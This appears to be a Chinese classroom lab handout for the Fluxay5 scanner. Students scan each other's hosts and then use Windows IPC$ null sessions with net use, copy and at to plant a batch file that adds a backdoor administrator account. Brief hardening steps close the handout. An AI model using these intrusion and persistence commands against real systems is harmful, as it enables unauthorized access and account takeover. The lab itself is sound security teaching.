
任务二:使用流光Fluxay5综合扫描工具并分析结果
各部份功能:
1: 暴力破解的设置区域
2:控制台输出
3:扫描出来的典型漏洞列表
4:扫描或者暴力破解成功的用户帐号
5:扫描和暴力破解的速度控制
6:扫描和暴力破解时的状态显示
7:中止按钮
8:探测记录查找
选择“文件(F)”→“高级扫描向导(W)”可打开高级扫描向导,设置扫描参数。
扫描结束后,流光会自动打开HTML格式的扫描报告,而且还把可利用的主机列在流光界面的最下方,如图1所示。
图1
单击主机列表中的主机便可以直接对目标主机进行连接操作,如图2所示。
图2
除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选取高级扫描工具设置:
分组角色:学生A、学生B互相扫描对方主机。
实验步骤:
(1)开放FTP服务,允许匿名连接。
(2)打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。
(3)仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。
(4)根据扫描结果分析FTP漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行FTP连接,尝试上传或下载文件。
(5)根据扫描结果分析IPC$漏洞:
IPC是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。
IPC$相关命令:
1.建立和目标的ipc$连接命令:net use \\\目标IP\\ipc$ “密码”/user:“ADMIN”(管理员账号),如:net use \\\192.168.27.128\\ipc$“”
/user:"administrator"
2.映射网络驱动器命令(将目标主机的盘映射到本地磁盘):net use 本地盘符\\\目标IP\盘符$,如:net use z:\\\\192.168.27.128\\c$
3.和目标建立了ipc$后,则可直接用IP加盘符加$访问。比如:copy 文件名\\\IP\盘符$\路径\文件名,如:
copy hack.bat\\\\192.168.27.128\\c$
也可直接对映射为本地磁盘的网络驱动器操作。
4.管理计算机上面的账号命令:net user
..查看账号命令:net user
..建立账号命令:net user name passwd/add(net user sysbak123456 /add :添加用户名为sysback,密码为123456的账号)
..删除账号命令:net user name /delete
5.管理工作组命令:net localgroup组名用户名/add[delete]
..如:net localgroupadministrators sysback/add。该命令表示把sysback用户添加到管理员组(administrators)。
6.查看目标计算机的系统时间:net time \\\ip
7.在远程主机上建立计划任务:at \\\IP TIME COMMAND ..at \\\192.168.27.128 13:45 c:\\hack.bat(该命令表示在下午13点45分
执行目标主机C盘中的hack.bat文件,时间一定要晚于当前远程主机系统时间)
8.删除和目标的ipc$连接命令:net use \\\IP\\ipc$ /del
9.断开所有IPC$连接:net use * /del
10.禁止建立空连接:运行regedit,找到主键[HKEY_LOCAL_MACHINE
\\SYSTEM \\CurrentControlSet\\Control \\LSA] ,把RestrictAnonymous(DWORD)的键值改为:00000001。
11.禁止自动打开默认共享:找到主键
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters],把AutoShareServer(DWORD)的键值改为:00000000,
如果不存在,就新建一个再改键值。
利用破解的用户ADMINISTRATOR对目标主机进行留后门入侵,步骤:
1.编写批处理文件hack.bat,文件中包含两个命令:
1)建立一个新账号,
2)将新账号加入administrators组。
2.使用net命令与目标主机建立连接
3.将批处理文件hack.back拷贝至目标主机上。
4.通过计划任务使目标主机执行hack.bat文件。
5.断开所有IPC$连接。
6.通过采用新账号与目标主机建立连接来验证账号是否成功建立。
7.删除和目标主机的连接。
执行安全防护措施:
1.目标主机对注册表进行修改:禁止建立空连接,禁止自动打开默认共享
2.重新使用net命令与目标主机建立连接,观察结果是否有变化。
